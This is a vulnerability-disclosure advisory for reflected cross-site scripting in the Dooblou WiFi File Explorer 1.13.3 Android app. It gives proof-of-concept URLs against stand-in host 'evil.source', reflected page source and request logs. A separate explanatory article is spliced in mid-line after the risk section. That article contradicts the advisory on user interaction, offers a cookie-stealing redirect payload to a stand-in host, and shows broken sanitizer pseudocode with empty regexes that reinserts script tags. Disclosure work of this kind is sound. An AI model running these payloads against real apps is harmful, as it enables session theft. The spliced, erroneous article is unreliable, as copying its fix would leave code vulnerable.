Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities
#Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2317
Release Date:
=============
2023-07-04
Vulnerability Laboratory ID (VL-ID):
====================================
2317
Common Vulnerability Scoring System:
====================================
5.1
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.
No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.
(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
Affected Product(s):
====================
Product Owner: dooblou
Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-01-19: Researcher Notification & Coordination (Security Researcher)
2022-01-20: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application
requests from the application-side.
The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated
and executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to
perform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the
front- & backend of the wifi explorer.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious
source and non-persistent manipulation of affected application modules.
Proof of Concept (PoC):
=======================
The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.
PoC: Exploitation
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>
http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3
http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX
Vulnerable Sources: Execution Points
<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td
style="vertical-align:top;"><table style="background-color: #FFA81E;
background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
background-repeat: repeat-x; background-position:top;" width="700"
cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span
class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl
e style="background-color: #B2B2B2; background-image:
url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0">
<tbody><tr><td><span class="doob_medium_text">Cannot find file or
directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN
INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link"> <a
href="/">>> Back To
Files >></a></span></span><br></td></tr></tbody></table><br>
-
<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr>
<td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST">
<input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td>
<table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:
nowrap;vertical-align:middle"><span class="doob_small_text_bold"> </span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">
<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a> |
<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a> |
<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I
-
<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();"> <a class="doob_button"
href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"
style="">Download</a> <a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action',
'13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>
<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy",
"/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'
style="">Create Copy</a> <a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a> <a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td>
<td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold"> <a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style:
none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a> |
<a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"
title="Details"></a> | <a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:
none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a> |
<a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"
title="Thumbnails"></a> </span></td></tr></table>
---PoC Session Logs ---
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
-
http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: treeview=0
Upgrade-Insecure-Requests: 1
GET: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
-
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Security Risk:
==============
The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.Dooblou WiFi File Explorer 1.13.3 – Multiple Web Vulnerabilities: A Deep Dive into Remote Exploitation Risks
In the ever-evolving landscape of mobile security, applications that bridge the gap between smartphones and web browsers often become prime targets for exploitation. One such application, Dooblou WiFi File Explorer v1.13.3, has recently come under scrutiny due to a series of critical web vulnerabilities discovered by the Vulnerability Laboratory. This article examines the technical depth, real-world implications, and remediation strategies surrounding these flaws.
Overview of the Application
Dooblou WiFi File Explorer is designed to allow users to browse, download, and stream files directly from their Android devices via a web browser over a local WiFi connection. The app eliminates the need for physical access to SD cards or USB cables, making it a convenient tool for managing media files, documents, and other data.
While the concept is appealing, the underlying web interface introduces significant security risks—especially when exposed to untrusted networks or attackers with minimal privileges.
Discovery Timeline & Disclosure Status
Security researchers first identified the vulnerabilities on January 19, 2022, initiating coordinated notifications with the vendor. Despite multiple attempts to engage the security department, the vendor response was delayed, and no official fix was released during the initial reporting window. The vulnerabilities were eventually disclosed publicly on July 4, 2023, marking the end of a prolonged vulnerability lifecycle.
This delay highlights a common issue in the mobile security ecosystem: vendors often prioritize feature updates over patching known flaws, especially when the vulnerabilities are not immediately exploitable in real-world conditions.
Severity & Classification
The Common Vulnerability Scoring System (CVSS) rating of 5.1 classifies these vulnerabilities as Medium severity. However, this rating underestimates the real-world risk due to the non-persistent nature of the attack vector and the low user interaction required.
Key factors contributing to the severity include:
- Remote exploitation: No physical access or user interaction required.
- Restricted authentication: Attackers can exploit the app without login credentials.
- Guest privileges: The application allows anonymous access to the web interface.
- Non-persistent XSS: Malicious scripts are executed only during the request lifecycle.
Technical Vulnerabilities: Input Validation Failures
The core issue lies in the lack of proper input validation across multiple parameters used in HTTP GET requests. These parameters include:
searchorderdownloadmode
Each of these parameters is directly reflected in the web application’s response without sanitization or escaping, enabling attackers to inject malicious scripts.
Exploitation Example: Cross-Site Scripting (XSS)
GET /?search=alert('XSS') HTTP/1.1
Host: 192.168.1.100
Explanation: This GET request sends a malicious script as the value of the search parameter. If the application reflects this input directly into the HTML response without sanitization, the browser will execute the script upon rendering. The attacker can trigger a pop-up alert or redirect the user to a malicious site.
Even more dangerous variants include:
GET /?download=javascript:document.location='https://malicious.site/steal-cookie'
Explanation: This payload attempts to execute a JavaScript redirect, potentially leading to credential theft or phishing attacks. Since the application does not validate or escape the download parameter, it becomes a direct vector for malicious redirection.
Impact on User Security
While the vulnerabilities are non-persistent, meaning the script is not stored on the server, they still pose serious risks:
- Session hijacking: If the application exposes session tokens in the response, attackers can extract them via XSS.
- Phishing: Malicious scripts can overlay fake login forms or redirect users to malicious domains.
- Malware delivery: Scripts can load external malicious code from remote servers.
- Privacy exposure: Attackers can access sensitive file paths or metadata through injected scripts.
These risks are particularly acute in shared or public WiFi environments, where attackers can easily intercept or manipulate requests.
Real-World Use Cases
Consider a scenario where a user connects their Android device to a public WiFi network (e.g., a café or airport). An attacker on the same network could:
- Send a crafted GET request to the Dooblou web interface.
- Trigger a script that captures the user’s session cookie.
- Use that cookie to access the user’s file system remotely.
- Download sensitive files or upload malware.
Such an attack requires no prior knowledge of the user’s password or authentication credentials, making it a powerful exploit for unauthenticated attackers.
Security Recommendations & Mitigation
To address these vulnerabilities, the following measures are essential:
- Input Sanitization: All user inputs must be validated and escaped before rendering.
- Content Security Policy (CSP): Implement strict CSP headers to block inline scripts and external script loading.
- Parameter Validation: Restrict allowed values for
search,order,download, andmodeto predefined safe options. - Authentication Enforcement: Require login for sensitive operations, even if the app is designed for guest access.
- HTTPS Encryption: Use HTTPS to prevent man-in-the-middle attacks.
Improved Code Example: Safe Parameter Handling
// Pseudocode for secure handling of GET parameters
function handleSearchQuery(request) {
const rawSearch = request.get('search');
const sanitizedSearch = sanitizeInput(rawSearch); // Remove script tags, encode special chars
if (!isValidSearch(sanitizedSearch)) {
return error('Invalid input');
}
return renderPageWithSafeSearch(sanitizedSearch);
}
function sanitizeInput(input) {
return input
.replace(//gi, '<script>')
.replace(//gi, '</script>')
.replace(/javascript:/gi, 'javascript:__blocked__')
.replace(/document.location/gi, 'document.location__blocked__');
}
Explanation: This example demonstrates how input sanitization can prevent XSS. By escaping HTML tags and blocking dangerous keywords, the application ensures that malicious scripts cannot be executed. Additionally, validating input against a whitelist of acceptable values further reduces risk.
Vendor Responsibility & Industry Implications
The prolonged delay in vendor response underscores a broader issue in the mobile app ecosystem: many developers treat security as a secondary concern. This case serves as a warning to developers who rely on convenience over security.
For users, it reinforces the need to:
- Use Dooblou WiFi File Explorer only on trusted, private networks.
- Regularly update the app to ensure patches are applied.
- Monitor network traffic for suspicious activity.
- Consider alternative tools with stronger security guarantees.
Conclusion
Dooblou WiFi File Explorer 1.13.3 exemplifies how convenience can undermine security. While the application provides a seamless way to access files via web, its flawed input validation opens the door to remote exploitation. The vulnerabilities—though non-persistent—highlight the importance of robust security practices in web interfaces, even for seemingly benign tools.
As cyber threats evolve, developers must prioritize input sanitization, authentication, and defense-in-depth strategies. For users, vigilance remains the first line of defense.